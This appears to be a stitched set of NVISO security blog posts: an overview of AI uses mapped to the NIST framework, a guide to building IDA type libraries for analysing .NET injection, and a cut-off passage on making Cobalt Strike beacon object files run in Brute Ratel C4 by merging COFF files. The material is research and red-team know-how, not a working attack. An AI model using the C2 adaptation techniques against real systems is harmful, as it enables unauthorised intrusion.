
AI in Cybersecurity: Bridging the Gap Between Imagination and Reality


In today’s digital environment, we encounter a mix of evolving cyber systems and the complexities they introduce. One notable influence in this space is artificial intelligence (AI), alongside associated technologies such as machine learning, which offer promising avenues for reshaping cyber strategies.

Traditionally, cybersecurity has operated with definitive parameters, set boundaries, and post-event counteractions. Yet, given the growth in digital data and the evolving nature of threats, there’s a clear shift towards strategies that are not only responsive but also proactive. AI and machine learning serve this purpose, providing defenses that are not only immediate but also predictive.

It’s important to clarify that the discussion isn’t solely about AI as a standalone term. Within this broader term are technologies like machine learning, neural networks, and deep learning, each having its significance in cybersecurity. However, given the extensive scope, our focus will be on select areas, shedding light on how these technologies function and their practical implications in cybersecurity.

The goal here is to explore the roles of AI and machine learning without presenting them as the singular answer but rather to understand their potential and limitations within cybersecurity.

For this purpose, a well-known cybersecurity framework proposed by NIST was used to understand the solution categories needed to protect against, detect, react to, and defend against cyberattacks.

R. Kaur et al., Information Fusion 97 (2023) 101804
The pillars of the NIST framework

The subsequent section provides a graphical representation that outlines specific areas in which AI and machine learning are applied in cybersecurity. These areas span from ‘Automated Security Control Validation’ to ‘Decision Support for Risk Planning’, showcasing the various types of technology that can be categorized under each domain. This visualization serves as a reference to understand the scope and classification of technologies discussed in the article.

Overview of potential use cases for AI
Created after:
Ramanpreet Kaur, Dušan Gabrijelčič, Tomaž Klobučar,
Artificial intelligence for cybersecurity: Literature review and future research directions, Information Fusion, Volume 97, 2023

In the domain of cybersecurity, while much attention has been given to Protection and Detection, there are other areas that demand attention and hold significant promise (in our case that would be Identify, Respond, Recover), especially with the advent of AI technologies. Many of these areas have been sidelined in popular discussions but are now emerging as pivotal components in the evolving cybersecurity landscape. Among these areas, we have identified several noteworthy topics:

  • Automated Security Control Validation: This refers to the automated processes used to confirm that security measures are operating correctly within a given system.
  • Automated Risk Analysis and Impact Assessment: A process that uses automation to evaluate potential threats and the possible consequences they could have on an organization.
  • Decision Support for Risk Planning: Using technology to aid decision-makers in strategizing and planning for potential risks.
  • Automated Responsibility Allocation: A method that uses automation to assign roles and responsibilities within a system, ensuring that tasks are designated to the right entity or personnel.
  • Information Sharing Property Platform: A platform designed to facilitate the sharing of information across different entities in a secure manner.
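As a toy illustration of the first item, an automated control check can be as simple as comparing a system's observed configuration against a baseline of expected controls. The sketch below is purely hypothetical (the control names and thresholds are invented for illustration); real validation products are far more involved.

```python
# Hypothetical sketch: validate observed settings against a security baseline.
# Each baseline entry maps a control name to a predicate that the observed
# value must satisfy.
BASELINE = {
    "password_min_length": lambda v: v >= 12,
    "tls_min_version": lambda v: v in ("1.2", "1.3"),
    "mfa_enabled": lambda v: v is True,
}

def validate_controls(observed):
    """Return the names of baseline controls that are missing or fail their check."""
    failures = []
    for control, check in BASELINE.items():
        if control not in observed or not check(observed[control]):
            failures.append(control)
    return failures
```

An automated validator would run such checks continuously against live configuration data rather than a static dictionary, which is where the speed and uniformity advantages discussed below come from.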

The foundation of this stems from the previously cited publication, a meta-study whose search yielded 2395 studies, of which 236 were identified as primary. The article classifies the identified AI use cases based on the NIST cybersecurity framework using a thematic analysis approach.

Why these topics?

In the current digital environment, businesses are required to anticipate and mitigate threats and vulnerabilities. The cyber landscape is continually changing. What was once considered secure can now be a weak point, underscoring the relevance of tools like Automated Security Control Validation and Risk Analysis. These tools enable companies to promptly detect and rectify vulnerabilities, staying abreast of the sophisticated techniques used by adversaries.

Business continuity is also crucial. Unresolved security issues can disrupt operations, affecting revenue and brand perception. Decision Support for Risk Planning offers a systematic approach for risk assessment and management, ensuring smooth operations amidst emerging threats.

Regulatory compliance adds another layer of complexity in many industries. Meeting these regulations often means implementing stringent security protocols. With updated practices such as automated responsibility allocation, companies can ensure adherence to legal requirements, minimizing legal repercussions.

As organizations grow, managing security across expansive infrastructures manually becomes complex. Automated solutions offer scalability in security, allowing businesses to expand without a corresponding rise in resources.

Information today represents a strategic asset. Platforms like an Information Sharing Property Platform could be essential, promoting a collective approach to cybersecurity, letting businesses share insights and strengthen overall security.

Building trust with customers, partners, and stakeholders is fundamental. Ensuring data security and safe interactions enhances this trust, providing a competitive advantage.

To sum up, in today’s digital world, for businesses to succeed, it’s imperative to embrace and stay updated with advanced security practices.

Evaluation of the studies under consideration

Below, we will examine each domain in detail, aiming to identify the pros and cons of employing AI and machine learning techniques, as derived from our analysis of the meta-study within the cybersecurity context.

Automated Security Control Validation

Advantages:
  • Automated checks can be performed much faster than manual validations.
  • Checks are performed uniformly, without human error.
  • Large infrastructures can be handled without additional resources.
  • Real-time validation ensures immediate detection of security misconfigurations.

Disadvantages:
  • Might occasionally flag legitimate configurations as violations.
  • Might not always adapt swiftly to rapidly evolving threat landscapes or new security protocols.
  • Over-dependence on AI might lead to negligence in manual checks.
  • May not capture subtle nuances or instinctual insights that experienced human professionals might recognize in complex security scenarios.
Overview of advantages and disadvantages of the integration of AI in Automated Security Control Validation

Automated Risk Analysis and Impact Assessment

Advantages:
  • Process vast amounts of data rapidly, providing insights quicker.
  • Predict potential future threats based on patterns.
  • Algorithms can correlate data from various sources for a more comprehensive risk profile.

Disadvantages:
  • Effective AI integration requires understanding and tuning of the models.
  • Excessive trust in AI’s recommendations might overshadow human judgment.
  • Effectiveness is dependent on the quality of the data fed to it.
Overview of advantages and disadvantages of the integration of AI in Automated Risk Analysis and Impact Assessment

Decision Support for Risk Planning

Advantages:
  • Simulation of various risk scenarios, aiding in decision-making.
  • Provide real-time updates based on changing data.

Disadvantages:
  • If historical data has biases, AI recommendations might inherit them.
  • It might be challenging to effectively implement AI in decision-making processes.
Overview of advantages and disadvantages of the integration of AI in Decision Support for Risk Planning

Automated Responsibility Allocation

Advantages:
  • Immediate allocation of responsibilities during incidents.
  • Reduced decision-making time during crises.
  • Decisions are based on data, not emotions or internal politics.

Disadvantages:
  • AI might not understand the nuances of every situation.
  • Requires continuous updates to responsibility matrices and rules.
  • Sole reliance on AI might lead to issues if the system fails during a critical incident.
Overview of advantages and disadvantages of the integration of AI in Automated Responsibility Allocation

Information Sharing Property Platform

Advantages:
  • Sift through vast amounts of shared information to find relevant insights.
  • Spot emerging threats or vulnerabilities from shared data.
  • Generate summaries or insights from the shared information.

Disadvantages:
  • AI processing shared information might raise privacy issues.
  • Might misinterpret or take certain shared information out of context.
  • If not properly secured, AI systems could be a target for malicious actors trying to manipulate shared data.
Overview of advantages and disadvantages of the integration of AI in Information Sharing Property Platform

When examining the pros and cons presented, are there recurring themes that allow us to draw overarching conclusions? Indeed, there are!

We can identify four distinct categories:

  1. Speed and Data
  2. Understanding and Decision Making
  3. Adaptability and Complexity
  4. Security and Information

But what does each category signify, and how do they influence the broader scope of AI and machine learning in cybersecurity?


In the context of AI and machine learning within cybersecurity, several themes are evident:

Regarding Speed and Data, AI facilitates rapid and uniform data processing. However, it’s important to note that the quality of outcomes is contingent on the integrity of the data input, and there exists a risk of over-reliance on this speed.

In the area of Understanding and Decision Making, AI offers expansive views, promoting more objective decision-making processes. Yet, AI systems might not always replicate the nuanced understanding characteristic of human cognition.

Within Adaptability and Complexity, AI’s strength lies in its scalability and its ability to model diverse scenarios. Nevertheless, these systems can face challenges adapting to rapid technological changes, and their deployment can be intricate.

For Security and Information, AI’s capability for real-time monitoring allows for immediate threat detection. However, the speed of processing might increase the probability of misinterpretations, potentially introducing security vulnerabilities.

In addition to these themes, the Human Factor remains pivotal. AI systems, despite their sophistication, cannot replace human judgment, especially in ambiguous situations that require intuitive reasoning. The human element brings a unique combination of experience, intuition, and ethical consideration, aspects that AI currently cannot replicate fully. Hence, while automating processes can enhance efficiency, the human oversight ensures that decisions align with organizational values and the broader context. Balancing the capabilities of AI with human expertise optimizes the cybersecurity framework, ensuring robustness and adaptability.

Overall, while AI and machine learning bring substantial advantages to cybersecurity, it’s crucial to consider their inherent limitations and dependencies.

Maurice Striek

Maurice Striek is a Consultant in the Cyber Security & Architecture Team (CSA) at NVISO. His expertise lies in risk analysis based on IT-Grundschutz and ISO 27001/2 standards, as well as data analysis and data management.

Generating IDA Type Information Libraries from Windows Type Libraries

When working with IDA, a commonly leveraged feature is type information libraries (TILs). These libraries contain high-level type information such as function prototypes, type definitions, standard structures, and enums, enabling IDA to convert statements such as movsxd rbx, dword ptr [r12+3Ch] into, for example, the more human-readable counterpart movsxd rbx, [r12+IMAGE_DOS_HEADER.e_lfanew].

On Windows, a similar concept called type libraries (TLB) exists to describe COM (Component Object Model) objects. In a nutshell, COM provides a language-independent interface to objects, abstracting how they have been implemented themselves.

In this quick post, we’ll explore how to convert Windows type libraries (TLB) into IDA type information libraries (TIL). In particular, we’ll generate the necessary type information library to analyze .NET injection into unmanaged processes using mscoree.dll and mscorlib.dll (e.g., through _AppDomain). In a hurry? Grab the .NET type information library directly!


TLB-to-TIL conversion can be achieved through an intermediary C++ step:

  1. First, the MSVC (Microsoft Visual C++) compiler can be leveraged to convert TLBs into their respective C++ header files.
  2. Once the C++ header files are generated, IDAClang can be used to convert these into TILs.
Figure 1: A schema of MSVC converting TLBs into C++ as well as IDAClang converting C++ into TILs.


To achieve TLB-to-TIL conversion, this article requires the following tools:

  1. The MSVC (Microsoft Visual C++) compiler installed through Visual Studio*.
  2. The IDAClang command-line utility.

* For our example, we’ll be generating a type information library targeting the .NET Framework, hence also requiring header files part of the .NET Framework Developer Pack (a.k.a. SDK). The .NET Framework Developer Pack can be installed through Visual Studio.

Given both MSVC and IDAClang rely on a properly configured developer environment (e.g., a configured INCLUDE environment variable), this article assumes all commands are issued within a Visual Studio Developer Command Prompt such as the “x64 Native Tools Command Prompt”.

Figure 2: A capture of the “x64 Native Tools Command Prompt” within the Windows Start menu.

Converting Microsoft Type Libraries to C++ Headers

Windows type libraries are a Windows-specific feature which integrates seamlessly with the MSVC compiler through the #import statement.

#import creates two header files that reconstruct the type library contents in C++ source code. The primary header file is similar to the one produced by the Microsoft Interface Definition Language (MIDL) compiler, but with additional compiler-generated code and data. The primary header file has the same base name as the type library, plus a .TLH extension.


As such, creating a C++ file to import a type library will generate its C++ header. Given we wish to convert mscorlib.tlb into C++ headers, we can create the following C++ file named, for example, til.cpp.

#import "mscorlib.tlb" raw_interfaces_only auto_rename

Once the C++ file has been created, we can rely on the MSVC compiler to generate the necessary headers. The command below will generate the mscorlib.tlh file.

CL.exe /c /D NDEBUG /D _CONSOLE /D _UNICODE /D UNICODE /permissive- /TP til.cpp

Converting C++ Headers to IDA Type Information Libraries

With the C++ headers generated, we can now proceed to create the IDA type information library. To do so, we can create a new C++ header file that will reference any standard headers (e.g., those from the .NET Framework Developer Pack) and generated headers (i.e., the previously generated mscorlib.tlh) we wish to use in IDA. The following is our example til.h.

// Include standard headers
// Example: Microsoft .NET Framework Developer Pack
#include <alink.h>
#include <clrdata.h>
#include <cordebug.h>
#include <corhlpr.h>
#include <corprof.h>
#include <corpub.h>
#include <corsym.h>
#include <fusion.h>
#include <gchost.h>
#include <ICeeFileGen.h>
#include <isolation.h>
#include <ivalidator.h>
#include <ivehandler.h>
#include <metahost.h>
#include <mscoree.h>
#include <openum.h>
#include <StrongName.h>
#include <tlbref.h>
#include <VerError.h>

// Include generated headers
// Example: Microsoft Common Language Runtime Class Library
//          The mscorlib.h generated from mscorlib.tlb
#include "mscorlib.tlh"

Once the C++ header file is created, we can rely on IDAClang to generate the TIL.

idaclang.exe -x c++ -target x86_64-pc-windows -ferror-limit=0 --idaclang-tildesc "Example" --idaclang-tilname "example.til" til.h

MSVC and Clang (used in IDAClang) are two different C++ compilers. Although they mostly agree, compiling MSVC-generated C++ code with Clang is bound to produce non-fatal errors. IDAClang may report quite a few errors, as shown below, but the TIL conversion should succeed after a moment.

IDACLANG: nonfatal: ./mscorlib.tlh:10774:1: error: enumeration previously declared with fixed underlying type
IDACLANG: nonfatal: ./mscorlib.tlh:11509:64: error: expected ';' after struct
IDACLANG: nonfatal: ./mscorlib.tlh:11509:1: error: declaration of anonymous struct must be a definition
IDACLANG: nonfatal: ./mscorlib.tlh:11510:11: error: expected unqualified-id

As an example, we published our .NET type information library mscoru.til.

Using the IDA Type Information Library

Once the TIL is generated, we can proceed to make it available to IDA. To do so, copy the TIL to the appropriate folder which, in our example, could be the C:\Program Files\IDA Pro 8.3\til\pc directory. Once the TIL is staged, IDA should display the new type information library and allow it to be loaded.

Figure 3: A capture of IDA’s Available Type Libraries.

With the TIL loaded, we can now instruct IDA to import the new structures such as ICLRMetaHost and its ICLRMetaHost_vtbl virtual function table.

Figure 4: A capture of IDA’s ICLRMetaHost structure.
Figure 5: A capture of IDA’s ICLRMetaHost_vtbl structure.

Once our structures are imported, we can leverage IDA’s structure offsets to make raw offsets human-readable, as observed in the following slider (left before, right after).

Figure 6: A capture of IDA’s ICLRMetaHost.GetRuntime call.

In our .NET injection analysis, this enables us to identify where the raw .NET assembly is loaded, as observed in the slider below (left before, right after). Such information in turn allows us to identify where it originates and where we could best intercept it for further analysis.

Figure 7: A capture of IDA’s _AppDomain.Load_3 call.

Conclusions & Lessons Learned

While tools such as OLEViewer alongside MIDL could in theory generate C++ code as well, we found these to be unreliable. Instead, working with MSVC and IDAClang provides a quick (and clean) approach to convert TLBs into TILs.

The process described above can be extended to other abused COM objects such as the Windows Script Host Object Model (with TLB %SystemRoot%\System32\wshom.ocx) or the Microsoft Management Console (with TLB %SystemRoot%\System32\mmc.exe).

By creating IDA type information libraries that match the libraries used by adversaries, we gain the capability to properly understand their tooling, analyze further stages, and best defend against them.



Maxime Thiebaut

Maxime Thiebaut is a GCFA-certified Incident Response & Digital Forensics Analyst within NVISO CSIRT. He spends most of his time performing defensive research and responding to incidents. Previously, Maxime worked on the SANS SEC699 course. Besides his coding capabilities, Maxime enjoys reverse engineering samples observed in the wild.

Introducing CS2BR pt. III – Knees deep in Binary


Over the span of the previous two blog posts in the series, I showed why the majority of Cobalt Strike (CS) BOFs are incompatible with Brute Ratel C4 (BRC4) and what you can do about it. I also presented CS2BR itself: it’s a tool that makes patching BOFs to be compatible with BRC4 a breeze. However, we also found some limitations to CS2BR’s current approach.

In this (final?) post in the series, we’ll take a look at one of CS2BR’s shortcomings: its reliance on source code for patching. We’ll see how this could be resolved and – spoiler alert – why we couldn’t do it (yet!) and decided to pull the plug on it. That’s right: this blog post won’t present a fancy new solution but rather the challenges you’ll encounter when you go down this rabbit hole.

True story: I thought it would be an easier ride.

This post will get a bit more technical than its predecessors. Don’t worry though, I’ll try my best not to get lost in itty-bitty details. So feel free to grab a coffee and prepare for a journey into the wonderful world of object files, how you can mess with them, and what I did to them.

I. Underlying motivation

When I finished work on CS2BR’s source code patching, I realized that there were two major issues with it that caused me headaches and that I wasn’t happy with:

  1. Input arguments: Supplying BOFs with input arguments in BRC4 isn’t straightforward and requires you to figure out the number and format of arguments, feed them into a standalone Python script, and pass the output into BRC4.
  2. Source code: In order to make BOFs compatible with BRC4 in the first place, CS2BR patches a compatibility layer (and some extras) into a BOF’s source code. You’ll then need to recompile the BOF in order to use it in BRC4.

While the first issue is just somewhat awkward, the second one can be a real showstopper in some cases:

  • Third party BOFs: There are proprietary, commercial BOFs out there that you might like to use in BRC4, but can’t because they’re incompatible. Since you usually don’t have access to their source code, you can’t use CS2BR to patch them.
  • Compilation: Usually BOFs come with limited features and thus don’t require crazy compilation environments. Well, if they do, CS2BR’s source code patching can interfere with that and potentially screw up your compilation configuration. You’d then need to get into the depths of makefiles, build scripts and Visual Studio project configurations to troubleshoot.

So wouldn’t it be great if we didn’t need access to source code? And wouldn’t it be cool to avoid recompilation of BOFs? There surely has to be a way to do this, right?

II. The idea

Since BOFs are object files (hence the name, beacon object files) and CS2BR’s compatibility layer can be compiled into an object file, we might just be able to merge both of them into a single object file.

Imagine it was that easy.

And indeed, it appears that you can merge object files using ld, the GNU linker:

ld --relocatable cs2br.o bof.o -o brc4bof.o

That’s the basic premise. Before we continue with the details of this idea, let’s have a brief look at the “Common Object File Format” (COFF) that our object files come in.

About COFF

At their core, object files are an intermediate format of executables: they contain compiled code and data but aren’t directly executable. Here’s the source code of a simple BRC4 BOF that prints its input arguments:

#include "badger_exports.h"
void coffee(char** argv, int argc, WCHAR** dispatch) {
    int i = 0;
    for (; i < argc; i++) {
        BadgerDispatch(dispatch, "Arg #%i: \"%s\"\n", (i+1), argv[i]);
    }
}
This can be compiled into a COFF file using a C compiler such as mingw on a Linux machine:

$ x86_64-w64-mingw32-gcc -o minimal.o -c minimal.c

$ file minimal.o        
minimal.o: Intel amd64 COFF object file, no line number info, not stripped, 7 sections, symbol offset=0x216, 19 symbols, 1st section name ".text"

We can get detailed information about the compiled object file using the nm or objdump utilities:

objdump output
$ objdump -x minimal.o              

minimal.o:     file format pe-x86-64
architecture: i386:x86-64, flags 0x00000039:
start address 0x0000000000000000

Characteristics 0x4
        line numbers stripped

Time/Date               Wed Dec 31 19:00:00 1969
Magic                   0000
MajorLinkerVersion      0
MinorLinkerVersion      0
SizeOfCode              0000000000000000
SizeOfInitializedData   0000000000000000
SizeOfUninitializedData 0000000000000000
AddressOfEntryPoint     0000000000000000
BaseOfCode              0000000000000000
ImageBase               0000000000000000
SectionAlignment        00000000
FileAlignment           00000000
MajorOSystemVersion     0
MinorOSystemVersion     0
MajorImageVersion       0
MinorImageVersion       0
MajorSubsystemVersion   0
MinorSubsystemVersion   0
Win32Version            00000000
SizeOfImage             00000000
SizeOfHeaders           00000000
CheckSum                00000000
Subsystem               00000000        (unspecified)
DllCharacteristics      00000000
SizeOfStackReserve      0000000000000000
SizeOfStackCommit       0000000000000000
SizeOfHeapReserve       0000000000000000
SizeOfHeapCommit        0000000000000000
LoaderFlags             00000000
NumberOfRvaAndSizes     00000000

The Data Directory
Entry 0 0000000000000000 00000000 Export Directory [.edata (or where ever we found it)]
Entry 1 0000000000000000 00000000 Import Directory [parts of .idata]
Entry 2 0000000000000000 00000000 Resource Directory [.rsrc]
Entry 3 0000000000000000 00000000 Exception Directory [.pdata]
Entry 4 0000000000000000 00000000 Security Directory
Entry 5 0000000000000000 00000000 Base Relocation Directory [.reloc]
Entry 6 0000000000000000 00000000 Debug Directory
Entry 7 0000000000000000 00000000 Description Directory
Entry 8 0000000000000000 00000000 Special Directory
Entry 9 0000000000000000 00000000 Thread Storage Directory [.tls]
Entry a 0000000000000000 00000000 Load Configuration Directory
Entry b 0000000000000000 00000000 Bound Import Directory
Entry c 0000000000000000 00000000 Import Address Table Directory
Entry d 0000000000000000 00000000 Delay Import Directory
Entry e 0000000000000000 00000000 CLR Runtime Header
Entry f 0000000000000000 00000000 Reserved

The Function Table (interpreted .pdata section contents)
vma:                    BeginAddress     EndAddress       UnwindData
 0000000000000000:      0000000000000000 000000000000006a 0000000000000000

Dump of .xdata
 0000000000000000 (rva: 00000000): 0000000000000000 - 000000000000006a
        Version: 1, Flags: none
        Nbr codes: 3, Prologue size: 0x08, Frame offset: 0x0, Frame reg: rbp
          pc+0x08: alloc small area: rsp = rsp - 0x30
          pc+0x04: FPReg: rbp = rsp + 0x0 (info = 0x0)
          pc+0x01: push rbp

Idx Name          Size      VMA               LMA               File off  Algn
  0 .text         00000070  0000000000000000  0000000000000000  0000012c  2**4
  1 .data         00000000  0000000000000000  0000000000000000  00000000  2**4
                  ALLOC, LOAD, DATA
  2 .bss          00000000  0000000000000000  0000000000000000  00000000  2**4
  3 .rdata        00000010  0000000000000000  0000000000000000  0000019c  2**4
  4 .xdata        0000000c  0000000000000000  0000000000000000  000001ac  2**2
  5 .pdata        0000000c  0000000000000000  0000000000000000  000001b8  2**2
  6 .rdata$zzz    00000020  0000000000000000  0000000000000000  000001c4  2**4
[  0](sec -2)(fl 0x00)(ty    0)(scl 103) (nx 1) 0x0000000000000000 minimal.c
[  2](sec  1)(fl 0x00)(ty   20)(scl   2) (nx 1) 0x0000000000000000 coffee
AUX tagndx 0 ttlsiz 0x0 lnnos 0 next 0
[  4](sec  1)(fl 0x00)(ty    0)(scl   3) (nx 1) 0x0000000000000000 .text
AUX scnlen 0x6a nreloc 2 nlnno 0
[  6](sec  2)(fl 0x00)(ty    0)(scl   3) (nx 1) 0x0000000000000000 .data
AUX scnlen 0x0 nreloc 0 nlnno 0
[  8](sec  3)(fl 0x00)(ty    0)(scl   3) (nx 1) 0x0000000000000000 .bss
AUX scnlen 0x0 nreloc 0 nlnno 0
[ 10](sec  4)(fl 0x00)(ty    0)(scl   3) (nx 1) 0x0000000000000000 .rdata
AUX scnlen 0xf nreloc 0 nlnno 0
[ 12](sec  5)(fl 0x00)(ty    0)(scl   3) (nx 1) 0x0000000000000000 .xdata
AUX scnlen 0xc nreloc 0 nlnno 0
[ 14](sec  6)(fl 0x00)(ty    0)(scl   3) (nx 1) 0x0000000000000000 .pdata
AUX scnlen 0xc nreloc 3 nlnno 0
[ 16](sec  7)(fl 0x00)(ty    0)(scl   3) (nx 1) 0x0000000000000000 .rdata$zzz
AUX scnlen 0x17 nreloc 0 nlnno 0
[ 18](sec  0)(fl 0x00)(ty    0)(scl   2) (nx 0) 0x0000000000000000 __imp_BadgerDispatch

OFFSET           TYPE              VALUE
0000000000000046 IMAGE_REL_AMD64_REL32  .rdata
0000000000000050 IMAGE_REL_AMD64_REL32  __imp_BadgerDispatch

OFFSET           TYPE              VALUE
0000000000000000 IMAGE_REL_AMD64_ADDR32NB  .text
0000000000000004 IMAGE_REL_AMD64_ADDR32NB  .text
0000000000000008 IMAGE_REL_AMD64_ADDR32NB  .xdata

This gives us quite a lot of information, of which I’d like to highlight and unpack three particularly important bits:

  1. Sections: These are regions of arbitrary, binary data. Their content is indicated by a section’s name and flags. For example, the .text section with the CODE flag set will usually contain compiled code whereas the .rdata section with the READONLY and DATA flags will contain readonly data (such as strings used in the application).
  2. Symbols: Symbols are used to reference various things in object files, such as sections (e.g. .text), functions (e.g. coffee) and imports (e.g. __imp_BadgerDispatch).
  3. Relocations: An object file’s sections can contain references to symbols (and thus to other sections, functions, and imports). When the file is compiled or loaded into memory by a COFF loader such as BRC4, these references need to be resolved to actual relative or absolute memory addresses.
    For example, the above BadgerDispatch call references the string Arg #%i: \"%s\"\n which is located in the .rdata section. The first relocation entry in the .text section indicates that at offset 0x46 into the .text section, there is a reference to the .rdata symbol (which points to the .rdata section), which needs to be resolved as a relative address.
COFF section contents dumped using objdump
$ objdump -s -j .rdata minimal.o

minimal.o:     file format pe-x86-64

Contents of section .rdata:
 0000 41726720 2325693a 20222573 220a0000  Arg #%i: "%s"...
$ objdump -S -j .text minimal.o 

minimal.o:     file format pe-x86-64

Disassembly of section .text:

0000000000000000 <coffee>:
   0:   55                      push   %rbp
   1:   48 89 e5                mov    %rsp,%rbp
   4:   48 83 ec 30             sub    $0x30,%rsp
   8:   48 89 4d 10             mov    %rcx,0x10(%rbp)
   c:   89 55 18                mov    %edx,0x18(%rbp)
   f:   4c 89 45 20             mov    %r8,0x20(%rbp)
  13:   c7 45 fc 00 00 00 00    movl   $0x0,-0x4(%rbp)
  1a:   eb 3e                   jmp    5a <coffee+0x5a>
  1c:   8b 45 fc                mov    -0x4(%rbp),%eax
  1f:   48 98                   cltq
  21:   48 8d 14 c5 00 00 00    lea    0x0(,%rax,8),%rdx
  28:   00 
  29:   48 8b 45 10             mov    0x10(%rbp),%rax
  2d:   48 01 d0                add    %rdx,%rax
  30:   48 8b 10                mov    (%rax),%rdx
  33:   8b 45 fc                mov    -0x4(%rbp),%eax
  36:   8d 48 01                lea    0x1(%rax),%ecx
  39:   48 8b 45 20             mov    0x20(%rbp),%rax
  3d:   49 89 d1                mov    %rdx,%r9
  40:   41 89 c8                mov    %ecx,%r8d
  43:   48 8d 15 00 00 00 00    lea    0x0(%rip),%rdx        # 4a <coffee+0x4a>
  4a:   48 89 c1                mov    %rax,%rcx
  4d:   48 8b 05 00 00 00 00    mov    0x0(%rip),%rax        # 54 <coffee+0x54>
  54:   ff d0                   call   *%rax
  56:   83 45 fc 01             addl   $0x1,-0x4(%rbp)
  5a:   8b 45 fc                mov    -0x4(%rbp),%eax
  5d:   3b 45 18                cmp    0x18(%rbp),%eax
  60:   7c ba                   jl     1c <coffee+0x1c>
  62:   90                      nop
  63:   90                      nop
  64:   48 83 c4 30             add    $0x30,%rsp
  68:   5d                      pop    %rbp
  69:   c3                      ret
  6a:   90                      nop
  6b:   90                      nop
  6c:   90                      nop
  6d:   90                      nop
  6e:   90                      nop
  6f:   90                      nop

These are the central parts of COFF files that are relevant to this blog post.
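The relocation mechanics described above can be sketched in a few lines. This is my own illustration (not CS2BR or COFFLoader code) of how a loader resolves an IMAGE_REL_AMD64_REL32 relocation like the one at .text offset 0x46: the 32-bit field holds a displacement measured from the byte following the field to the target symbol, and the section mapping addresses are assumptions for the example.

```python
import struct

def apply_rel32(text: bytearray, reloc_offset: int, text_va: int, target_va: int) -> None:
    # Any value already stored in the 4-byte field acts as an addend.
    addend = struct.unpack_from("<i", text, reloc_offset)[0]
    # RIP-relative: the displacement is measured from the end of the field.
    disp = target_va + addend - (text_va + reloc_offset + 4)
    struct.pack_into("<i", text, reloc_offset, disp)

# Suppose .text is mapped at 0x1000 and the referenced .rdata string at 0x2000:
text = bytearray(0x70)
apply_rel32(text, 0x46, 0x1000, 0x2000)
print(hex(struct.unpack_from("<i", text, 0x46)[0]))  # 0xfb6 == 0x2000 - 0x104a
```

With the displacement in place, the lea at offset 0x43 would then compute the address of the .rdata string relative to RIP at runtime.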

Merging object files

Continuing with the idea of merging object files, it turns out that it’s not just going to be a simple ld. Let’s compare a regular BOF in Cobalt Strike to a CS2BR BOF in BRC4:

Regular CS BOF

Pictured above is a regular CS BOF: it resides in a beacon, is executed via its go entrypoint and can make use of several CS BOF APIs. In order to execute the BOF, the beacon acts as a linker: it maps the BOF’s sections into memory, resolves CS BOF API imports to the beacon’s internal implementations and resolves relocations. That’s the regular flow of things.
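The beacon’s three “linker duties” can be modeled as a toy, runnable sketch. This is my own heavily simplified illustration, not Cobalt Strike internals; the one-byte “fixup” stands in for real relocation processing:

```python
def load_bof(sections, symbols, relocations, beacon_api):
    # 1. "Map" each section into writable memory.
    mapped = {name: bytearray(data) for name, data in sections.items()}
    # 2. Resolve CS BOF API imports (__imp_*) to the beacon's implementations.
    resolved = dict(symbols)
    for name in symbols:
        if name.startswith("__imp_") and name[len("__imp_"):] in beacon_api:
            resolved[name] = beacon_api[name[len("__imp_"):]]
    # 3. Apply relocations (toy single-byte "fixups" for illustration).
    for section, offset, symbol in relocations:
        mapped[section][offset] = resolved[symbol] & 0xFF
    return mapped

out = load_bof({".text": b"\x00\x00"},
               {"__imp_BeaconPrintf": 0},
               [(".text", 1, "__imp_BeaconPrintf")],
               {"BeaconPrintf": 0x42})
print(out[".text"])  # bytearray(b'\x00B')
```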


Here’s how the general CS2BR approach works: it provides the CS BOF APIs as part of its compatibility layer. This layer in turn uses the BRC4 BOF APIs which are implemented in the BRC4 badger. From our perspective, a badger loads & executes a BOF similar to how CS does.

When we patch a BOF’s source code via CS2BR and compile it afterwards, the coffee entrypoint will be included in the BOF and able to invoke the original go entrypoint (*). Additionally, calls to the CS BOF API will be “rerouted” to CS2BR’s compatibility layer (*). When both BOF and the CS2BR compatibility layer are compiled separately though, we need to ensure that those two connections are made when we merge the object files. For simplicity’s sake, let’s refer to the compiled CS BOF as bof.o and to the compiled CS2BR compatibility layer as cs2br.o:

  • Entrypoint: The coffee entrypoint in cs2br.o needs to reference the go entrypoint in bof.o. When the files are merged, this reference must be resolved.
  • APIs: The CS BOF APIs imported in bof.o must be “re-wired” so they don’t reference imports but cs2br.o‘s implementations instead.

Well, this doesn’t sound super complicated, does it?

III. Execution

Now it’s only a matter of putting everything together. We’ll start with the entrypoint:

Preparing the entrypoint

In order to reference bof.o‘s go entrypoint from cs2br.o, we can leverage the fact that such operations are precisely what object files and linkers are great at accomplishing: by defining go as an external symbol in cs2br.o, a linker will resolve it when also supplying it with bof.o which provides this exact symbol. So here’s the single line we add to CS2BR’s badger_stub.c that contains our custom coffee entrypoint:

extern void go(void *, int);

Now, when we compile CS2BR’s entrypoint in badger_stub.c and its compatibility layer beacon_wrapper.h, we can observe the resulting cs2br.o’s symbols. For comparison, let’s also inspect bof.o’s symbols:

$ objdump -x cs2br.o | grep go  
[ 52](sec  0)(fl 0x00)(ty   20)(scl   2) (nx 0) 0x0000000000000000 go

$ objdump -x bof.o | grep go
[  2](sec  1)(fl 0x00)(ty   20)(scl   2) (nx 1) 0x0000000000000000 go

We can use Microsoft’s documentation on the PE format (which also covers COFF) to better understand what those entries mean:

  • sec: “The signed integer that identifies the section, using a one-based index into the section table. Some values have special meaning […].”
    • Value 0 (IMAGE_SYM_UNDEFINED): “[…] A value of zero indicates that a reference to an external symbol is defined elsewhere. […]”
  • ty: “A number that represents type. Microsoft tools set this field to 0x20 (function) or 0x0 (not a function). […]”
  • The value (hex value before the symbol name): “The value that is associated with the symbol. The interpretation of this field depends on SectionNumber and StorageClass. A typical meaning is the relocatable address.”
  • scl: “An enumerated value that represents storage class. […]”
    • Value 2 (IMAGE_SYM_CLASS_EXTERNAL): “[…] The Value field indicates the size if the section number is IMAGE_SYM_UNDEFINED (0). If the section number is not zero, then the Value field specifies the offset within the section.”

Using this information, we can deduce that:

  • cs2br.o‘s go symbol is an external symbol defined elsewhere.
  • bof.o‘s go symbol is located in section 1 (.text), right at the start of the section (offset 0).
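The fields we just interpreted come from fixed-size 18-byte symbol-table records. As a hedged helper of my own (based on the PE/COFF specification, handling short names only, not the string-table case), we can parse one record and recover exactly the fields objdump printed:

```python
import struct

# Layout per the PE/COFF spec: 8s Name, I Value, h SectionNumber,
# H Type, B StorageClass, B NumberOfAuxSymbols == 18 bytes total.
SYM_FMT = "<8sIhHBB"

def parse_symbol(record: bytes) -> dict:
    name, value, section, typ, scl, n_aux = struct.unpack(SYM_FMT, record)
    return {
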